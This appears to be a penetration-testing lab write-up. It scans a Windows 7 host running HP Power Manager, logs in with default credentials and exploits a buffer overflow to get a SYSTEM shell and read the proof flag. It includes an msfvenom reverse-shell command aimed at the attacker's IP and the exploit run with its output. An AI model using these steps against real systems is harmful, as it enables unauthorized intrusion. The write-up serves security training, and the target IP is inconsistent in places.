TCP Ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-25 16:27 +08
Nmap scan report for 192.168.165.45
Host is up (0.038s latency).
Not shown: 45720 closed tcp ports (conn-refused), 19803 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
3573/tcp open tag-ups-1
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49158/tcp open unknown
49160/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 9.58 seconds
TCP Service Scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-25 16:27 +08
Nmap scan report for 192.168.165.45
Host is up (0.038s latency).
PORT STATE SERVICE VERSION
80/tcp open http GoAhead WebServer
| http-title: HP Power Manager
|_Requested resource was http://192.168.165.45/index.asp
|_http-server-header: GoAhead-Webs
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Ultimate N 7600 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2024-11-25T08:29:04+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=kevin
| Not valid before: 2024-08-02T05:20:45
|_Not valid after: 2025-02-01T05:20:45
3573/tcp open tag-ups-1?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
Service Info: Host: KEVIN; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows 7 Ultimate N 7600 (Windows 7 Ultimate N 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::-
| Computer name: kevin
| NetBIOS computer name: KEVIN\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-11-25T00:28:56-08:00
| smb2-time:
| date: 2024-11-25T08:28:56
|_ start_date: 2024-11-25T08:26:39
|_nbstat: NetBIOS name: KEVIN, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56🆎83:f8 (VMware)
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
|_clock-skew: mean: 1h59m58s, deviation: 4h00m00s, median: -1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.00 seconds
UDP Ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-25 16:27 +08
Warning: 192.168.165.45 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.165.45
Host is up (0.039s latency).
Not shown: 65066 open|filtered udp ports (no-response), 468 closed udp ports (port-unreach)
PORT STATE SERVICE
137/udp open netbios-ns
Nmap done: 1 IP address (1 host up) scanned in 72.65 seconds
UDP Service Scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-25 16:28 +08
Nmap scan report for 192.168.165.45
Host is up (0.039s latency).
PORT STATE SERVICE VERSION
137/udp open netbios-ns Microsoft Windows netbios-ns (workgroup: WORKGROUP)
| nbns-interfaces:
| hostname: KEVIN
| interfaces:
|_ 192.168.165.45
Service Info: Host: KEVIN; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: KEVIN, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56🆎83:f8 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.62 seconds
HP Power Manager
Port 80 gave us a HP Power Manager login screen.
http://192.168.165.45
Default Credentials
admin:admin gets us in.
Version
HP Power Manager 4.2 (Build 7)
Exploit
https://github.com/CountablyInfinite/HP-Power-Manager-Buffer-Overflow-Python3 There is a Buffer Overflow exploit for this version.
Generate Shellcode
Using the command provided in the exploit we can generate the necessary shellcode.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.169 LPORT=445 EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5' x86/alpha_mixed --platform windows -f python
Run Exploit
python3 exploit.py 192.168.105.45 80 445
[+] HP Power Manager 'formExportDataLogs' Buffer Overflow Exploit
[+] Sending exploit to Ip 192.168.105.45 on port 80. Starting local listener on port 445
Can't grab 0.0.0.0:445 with bind : Permission denied
Upon running the exploit, there was a “Permission denied” error because I had a nc listener opened on port 445.
Looking at the script again, it seems that it will run a nc listener as well so I didn’t have to do it myself.
Run Exploit w/o nc Listener
sudo python3 exploit.py 192.168.105.45 80 445
[+] HP Power Manager 'formExportDataLogs' Buffer Overflow Exploit
[+] Sending exploit to Ip 192.168.105.45 on port 80. Starting local listener on port 445
listening on [any] 445 ...
connect to [192.168.45.169] from (UNKNOWN) [192.168.105.45] 49593
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
Running only exploit.py without separately having my own nc listener, we get a shell. Also as usual, I used a port that is open on the target machine so that we don’t meet with any firewall issues.
root / nt authority\system
C:\Windows\system32>cd C:\Users
C:\Users>dir
Volume in drive C has no label.
Volume Serial Number is A451-A4B1
Directory of C:\Users
03/05/2010 12:26 AM <DIR> .
03/05/2010 12:26 AM <DIR> ..
03/05/2010 12:26 AM <DIR> Administrator
10/03/2011 04:59 AM <DIR> kevin
07/13/2009 08:08 PM <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 1,784,066,048 bytes free
C:\Users>cd Administrator/Desktop
C:\Users\Administrator\Desktop>type proof.txt
b5844010e92893d2f4f933e97ca5f4c1